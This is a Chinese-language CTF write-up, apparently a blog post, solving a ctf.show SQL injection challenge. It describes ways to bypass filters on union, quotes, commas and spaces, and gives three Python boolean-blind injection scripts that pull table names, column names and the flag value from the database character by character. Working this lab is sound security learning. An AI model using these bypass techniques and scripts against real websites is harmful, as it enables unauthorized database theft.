問題描述
題目提示是一道sql注入題
打開題目,猜測注入點應該在id那里
經過測驗,發現該題過濾了union關鍵字、單引號、逗號、空格
問題解決
1.過濾了union關鍵字就不可以用聯合注入了,嘗試布爾盲注,
2.過濾了逗號,使用mid(username from 1 for 1)代替mid(username,1,1);
使用limit 1 offset 1代替limit 1,1
3.過濾了空格就是用/**/注釋來繞過,
4.過濾了單引號,我們使用ord()將待檢測字符轉換為ascii進行比較
下面我們來寫python腳本跑一下
獲取資料表名
import requests
chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"#待測驗字符
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"#題目地址
for n in range(0,2):#爆破前兩個表
table_name = ''
for i in range(1, 10):#爆破資料表名的前十位(我們猜測該表名長度低于十位)
for char in chars:#測驗每一個待測字符
params = {
"id":
"-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(database())/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
}
r = requests.get(url=url, params=params)
#print(r.request.url)
if "If" in r.text:
table_name += char
print( table_name)獲取欄位名
import requests
chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"
for n in range(0,1):
table_name = ''
for i in range(1, 10):
for char in chars:
params = {
"id":
"-1/**/or/**/ord(mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/in/**/(0x666c6167)/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
}
r = requests.get(url=url, params=params)
#print(r.request.url)
if "If" in r.text:
table_name += char
print( table_name)獲取欄位值
import requests
chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"
for n in range(0,1):
table_name = ''
for i in range(1, 50):
for char in chars:
params = {
"id":
"-1/**/or/**/ord(mid((select/**/flag/**/from/**/flag/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
}
r = requests.get(url=url, params=params)
#print(r.request.url)
if "If" in r.text:
table_name += char
print( table_name)獲取flag
來自ctf小菜雞的日常分享,歡迎各位大佬留言,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/327870.html
標籤:其他
上一篇:JSFinder的使用說明
下一篇:XSS學習筆記整理